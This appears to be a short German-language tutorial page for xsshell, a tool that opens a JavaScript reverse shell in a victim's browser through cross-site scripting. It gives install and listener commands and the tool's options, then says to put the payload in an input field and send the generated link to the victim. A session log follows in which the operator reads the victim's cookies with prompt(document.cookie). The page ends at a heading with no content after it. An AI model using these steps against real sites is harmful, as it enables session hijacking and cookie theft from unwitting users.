Xsshell
git clone
- sudo apt-get install go
- go get github.com/raz-varren/xsshell
- go install github.com/raz-varren/xsshell
start
- ./xsshell -host 127.0.0.1 -port 4444
xsshell -h Usage of xsshell:
-cert string ssl cert file -host string websocket listen address -key string ssl key file -log string specify a log file to log all console communication -path string websocket connection path (default "/s") -port string websocket listen port (default "8234") -servdir string specify a directory to serve files from. a file server will not be started if no directory is specified -servpath string specify the base url path that you want to serve files from (default "/static/") -wrkdir string working directory that will be used as the relative root path for any commands requiring user provided file paths
Payload
- Payload muss ins Eingabefeld
- Generierter Link wird zum Opfer geschickt
Die Shell
Listening on [any] 5555 for incoming JS shell ... Got JS shell from [10.85.70.1] port 53146 to orville 5555 >>> var test = 'hacked by xinux' >>> confirm(test) >>> prompt(document.cookie)
Auf dem Client
